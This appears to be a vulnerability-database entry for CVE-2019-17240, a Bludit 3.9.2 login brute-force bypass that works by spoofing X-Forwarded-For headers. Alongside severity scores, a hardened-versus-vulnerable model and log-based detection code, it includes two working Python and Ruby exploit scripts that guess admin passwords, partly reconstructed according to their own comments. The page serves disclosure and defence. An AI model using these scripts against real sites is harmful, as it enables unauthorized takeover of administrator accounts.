CVE-2019-17240
Published 2019-10-06
Priority P272 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit available
EPSS: 39.60% (98.4th percentile)
bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers.
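To make the flaw concrete, here is an added Python model (not Bludit's PHP and not the project's code) of the logic the advisory describes: a per-IP failure counter whose key the vulnerable resolver takes from the client-supplied X-Forwarded-For / Client-IP headers, beside a hardened resolver that only honours X-Forwarded-For when the TCP peer is a known proxy. The CGI-style env keys stand in for the headers; the failure threshold, the trusted-proxy address, the attacker addresses and the wordlist are assumptions constructed for the example.

```python
from collections import defaultdict

MAX_ATTEMPTS = 5                 # assumed failure threshold for the model
TRUSTED_PROXIES = {"10.0.0.2"}   # assumed: the only peer allowed to set XFF


def vulnerable_client_ip(env):
    """The described Bludit 3.9.2 behaviour: client-supplied proxy headers
    win over the TCP peer address, so the attacker chooses the block-list key."""
    for key in ("HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR"):
        if env.get(key):
            return env[key]
    return env["REMOTE_ADDR"]


def hardened_client_ip(env):
    """Honour X-Forwarded-For only when the TCP peer is a known proxy, and
    then use the element that proxy appended (the last one); the first
    element is whatever the client sent and is attacker-controlled."""
    peer = env["REMOTE_ADDR"]
    xff = env.get("HTTP_X_FORWARDED_FOR", "")
    if peer in TRUSTED_PROXIES and xff:
        return xff.split(",")[-1].strip()
    return peer


class BruteForceGuard:
    """Minimal per-IP failure counter, parameterised on how the IP is derived."""

    def __init__(self, ip_func, max_attempts=MAX_ATTEMPTS):
        self.ip_func = ip_func
        self.max_attempts = max_attempts
        self.failures = defaultdict(int)

    def attempt(self, env, password_ok):
        ip = self.ip_func(env)
        if self.failures[ip] >= self.max_attempts:
            return "blocked"
        if password_ok:
            self.failures[ip] = 0
            return "ok"
        self.failures[ip] += 1
        return "fail"


def run_attack(ip_func, wordlist, secret, attacker_ip="203.0.113.7"):
    """One attacker socket address, a fresh spoofed X-Forwarded-For per guess.
    Returns (outcome, number_of_requests_sent)."""
    guard = BruteForceGuard(ip_func)
    for n, guess in enumerate(wordlist, 1):
        env = {"REMOTE_ADDR": attacker_ip, "HTTP_X_FORWARDED_FOR": f"192.0.2.{n}"}
        result = guard.attempt(env, guess == secret)
        if result in ("ok", "blocked"):
            return result, n
    return "exhausted", len(wordlist)


WORDLIST = [f"password{i}" for i in range(1, 21)]   # constructed sample wordlist
SECRET = "password12"                               # constructed target password

if __name__ == "__main__":
    # Vulnerable keying never blocks: every guess looks like a new client.
    print("vulnerable:", run_attack(vulnerable_client_ip, WORDLIST, SECRET))
    # Hardened keying blocks the attacker's real address after MAX_ATTEMPTS.
    print("hardened:  ", run_attack(hardened_client_ip, WORDLIST, SECRET))
```

The hardened resolver is the shape of the usual fix: derive the rate-limit key from REMOTE_ADDR unless the request demonstrably came through your own proxy tier, and even then take the address that proxy appended rather than the first value in the list. Client-IP is ignored outright because nothing in a typical deployment sets it.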
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bludit | bludit | 3.9.2 (per the advisory) | — |
Detection & IOCs (extracted from sources)
- Detect bypass attempts by monitoring for repeated login requests from the same source that carry X-Forwarded-For or Client-IP headers with many different IP values. "Same source" here means the TCP peer address; if your log's client-address field is itself populated from X-Forwarded-For, the rotation will look like many distinct clients and the correlation is lost.
- Monitor POST requests to the Bludit login endpoint for a 'tokenCSRF' field alongside 'username' and 'password' fields, combined with rotating X-Forwarded-For or Client-IP header values, as an indicator of automated credential stuffing.
- Alert when a response containing the text 'has been blocked' is followed by further login attempts from the same source with different spoofed IP headers; that sequence indicates active exploitation of the mitigation bypass.
- Successful exploitation results in a redirect to /admin/dashboard; monitor for 302 responses with a Location header pointing to /admin/dashboard following a series of login attempts with rotating IP headers.
- The brute-force protection in Bludit 3.9.2 trusts client-supplied X-Forwarded-For and Client-IP headers for IP-based blocking, so any attacker who rotates those header values bypasses it. The vulnerable logic resides in bl-kernel/security.class.php.
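The first, second and fourth indicators above reduce to one correlation: a single socket source address that presents many different X-Forwarded-For or Client-IP values on login POSTs in a short window, with a 302 to /admin/dashboard as the success signal. Here is an added Python implementation of that logic over constructed log lines (illustration, not a detection rule from the page or the Bludit project). The key=value log format, its field names, the 5-minute window and the threshold of five distinct values are assumptions; note that default Apache and nginx log formats do not record these headers, so they must be added to the format (Apache `%{X-Forwarded-For}i`, nginx `$http_x_forwarded_for`) before any such rule can fire.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed key=value log format for this example (an assumption; the
# web server has to be configured to log X-Forwarded-For and Client-IP).
LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) xff="(?P<xff>[^"]*)" cip="(?P<cip>[^"]*)" '
    r'method=(?P<method>\S+) path=(?P<path>\S+) status=(?P<status>\d+)'
    r'(?: location=(?P<location>\S+))?$')

LOGIN_PATH = "/admin/login"
DASHBOARD = "/admin/dashboard"

# Constructed sample: one attacker (203.0.113.7) rotating both headers until a
# 302 to the dashboard, plus two benign sources whose headers never change.
SAMPLE_LOG = """\
2020-10-23T10:00:01Z src=198.51.100.5 xff="" cip="" method=POST path=/admin/login status=200
2020-10-23T10:00:02Z src=203.0.113.7 xff="192.0.2.1" cip="" method=POST path=/admin/login status=200
2020-10-23T10:00:03Z src=203.0.113.7 xff="192.0.2.2" cip="" method=POST path=/admin/login status=200
2020-10-23T10:00:04Z src=203.0.113.7 xff="192.0.2.3" cip="" method=POST path=/admin/login status=200
2020-10-23T10:00:05Z src=10.0.0.2 xff="172.16.0.9" cip="" method=POST path=/admin/login status=200
2020-10-23T10:00:06Z src=203.0.113.7 xff="" cip="192.0.2.4" method=POST path=/admin/login status=200
2020-10-23T10:00:07Z src=203.0.113.7 xff="" cip="192.0.2.5" method=POST path=/admin/login status=200
2020-10-23T10:00:08Z src=10.0.0.2 xff="172.16.0.9" cip="" method=POST path=/admin/login status=200
2020-10-23T10:00:09Z src=203.0.113.7 xff="192.0.2.6" cip="" method=POST path=/admin/login status=200
2020-10-23T10:00:10Z src=203.0.113.7 xff="192.0.2.7" cip="" method=GET path=/admin/login status=200
2020-10-23T10:00:11Z src=203.0.113.7 xff="192.0.2.8" cip="" method=POST path=/admin/login status=302 location=/admin/dashboard
2020-10-23T10:00:12Z src=198.51.100.5 xff="" cip="" method=POST path=/admin/login status=200
"""


def parse(text):
    """Yield one event dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        ev["status"] = int(ev["status"])
        yield ev


def detect_header_rotation(text, distinct_threshold=5, window_seconds=300):
    """One alert per socket source address that sent login POSTs carrying at
    least `distinct_threshold` different (X-Forwarded-For, Client-IP) pairs
    within `window_seconds`.  The spoofed values themselves do not matter;
    what matters is that the real peer address (`src`) never changes."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # src -> deque of (ts, (xff, cip)) in window
    alerts = {}
    for ev in parse(text):
        if ev["method"] != "POST" or ev["path"] != LOGIN_PATH:
            continue
        src = ev["src"]
        q = recent[src]
        q.append((ev["ts"], (ev["xff"], ev["cip"])))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()
        distinct = {key for _, key in q}
        if len(distinct) < distinct_threshold:
            continue
        a = alerts.setdefault(src, {"src": src, "first_seen": q[0][0],
                                    "distinct_values": 0, "success": False})
        a["distinct_values"] = max(a["distinct_values"], len(distinct))
        a["last_seen"] = ev["ts"]
        # A dashboard redirect after the rotation means a guess succeeded and
        # the admin account is now compromised, not merely under attack.
        if ev["status"] == 302 and ev.get("location") == DASHBOARD:
            a["success"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_header_rotation(SAMPLE_LOG):
        print(alert)
```

The benign proxy at 10.0.0.2 forwards the same client twice and never trips the threshold, and the GET at 10:00:10 is ignored because only login POSTs count; on the sample the attacker's seven distinct header pairs produce one alert marked as a successful login.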
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 3.0 | 3.7 | LOW | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N |
| NVD | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:N/A:N |
NVD carries two v3 scores for this CVE: a v3.0 vector (AC:H, C:L, 3.7 LOW) and a v3.1 vector (AC:L, C:H/I:H/A:H, 9.8 CRITICAL) that the headline score above follows. The critical rating is the one to act on: the bypass removes the only control between an attacker and an unlimited online password-guessing attack against the admin account.
No detection rules found.
Exploit-DB
Bludit 3.9.2 - Auth Bruteforce Bypass
exploitdb · 2020-10-23 · CVSS 9.8
---
```python
#!/usr/bin/python3
# Exploit
## Title: Bludit 3.9.2 - Auth Bruteforce Bypass
# Note: the page's copy is truncated before the login function; the request
# logic below (session + CSRF token, one spoofed X-Forwarded-For value per
# attempt) is reconstructed so that the surviving loop runs end to end.
import re
import sys
import requests
from pwn import log   # pwntools logger, as used by the surviving log.* calls

Login_URL = sys.argv[1].rstrip('/') + '/admin/login'   # argv[1]: http://target/
Username_list, Password_list = sys.argv[2], sys.argv[3]

def login(Username, Password):
    s = requests.Session()
    r = s.get(Login_URL)
    csrf = re.search(r'name="tokenCSRF"\s+value="([^"]+)"', r.text).group(1)
    # The block list is keyed on this header, so a fresh value per guess
    # means no "address" ever reaches the failure threshold.
    headers = {'X-Forwarded-For': Password}
    data = {'tokenCSRF': csrf, 'username': Username, 'password': Password}
    r = s.post(Login_URL, headers=headers, data=data, allow_redirects=False)
    log.info('Trying {U}:{P}'.format(U = Username, P = Password))
    #Conditional loops
    if 'Location' in r.headers:
        if "/admin/dashboard" in r.headers['Location']:
            print()
            log.info(f'SUCCESS !!')
            log.success(f"Use Credential -> {Username}:{Password}")
            sys.exit(0)
    elif "has been blocked" in r.text:
        log.failure(f"{Password} - Word BLOCKED")

#Reading User.txt & Pass.txt files
userfile = open(Username_list).readlines()
for Username in userfile:
    Username = Username.strip()
    passfile = open(Password_list).readlines()
    for Password in passfile:
        Password = Password.strip()
        login(Username,Password)
```
Exploit-DB
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
exploitdb · 2020-08-17 · CVSS 9.8
---
```ruby
#!/usr/bin/env ruby
## Title: Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
## Author: noraj (Alexandre ZANNI)
## Author website: https://pwn.by/noraj/
## Date: 2020-08-16
## Vendor Homepage: https://www.bludit.com/
## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
## Version: 3.9.2
# Note: only the header, the login loop and part of the usage text survived on
# the page; the session/CSRF handling and option parsing are reconstructed.
require 'docopt'
require 'net/http'
require 'uri'

# Bludit answers a correct password with a 302 to the dashboard.
def auth_ok?(res)
  res.is_a?(Net::HTTPRedirection) && res['Location'].to_s.include?('/admin/dashboard')
end

def bruteforce(root_url, username, wordlist, debug: false)
  login_url = URI("#{root_url.chomp('/')}/admin/login")
  client = Net::HTTP.new(login_url.host, login_url.port)
  client.use_ssl = (login_url.scheme == 'https')
  # One GET yields the session cookie and the CSRF token bound to it.
  page = client.get(login_url.request_uri)
  cookie = page['Set-Cookie'].to_s.split(';').first
  csrf_token = page.body[/name="tokenCSRF"\s+value="([^"]+)"/, 1]
  File.foreach(wordlist).with_index(1) do |password, i|
    password = password.chomp
    # A new spoofed client address per attempt: the block list never fills up.
    headers = { 'Cookie' => cookie, 'X-Forwarded-For' => "#{i}-#{password[..4]}" }
    data = { 'tokenCSRF' => csrf_token, 'username' => username, 'password' => password }
    puts "[*] Trying password: #{password}"
    auth_res = client.post(login_url.request_uri, URI.encode_www_form(data), headers)
    puts auth_res.body if debug
    if auth_ok?(auth_res)
      puts "\n[+] Password found: #{password}"
      break
    end
  end
end

doc = <<~DOCOPT
  Usage:
    #{__FILE__} -r <root_url> -u <username> -w <wordlist> [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <root_url>, --root-url <root_url>  Root URL (base path) including HTTP scheme, port and root folder
    -H, --help                            Show this help
DOCOPT

begin
  args = Docopt.docopt(doc)
  bruteforce(args['--root-url'], args['-u'], args['-w'], debug: args['--debug'])
rescue Docopt::Exit => e
  puts e.message
end
```
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/158875/Bludit-3.9.2-Authentication-Bruteforce-Mitigation-Bypass.html
- http://packetstormsecurity.com/files/159664/Bludit-3.9.2-Bruteforce-Mitigation-Bypass.html
- https://github.com/bludit/bludit/pull/1090
- https://rastating.github.io/bludit-brute-force-mitigation-bypass/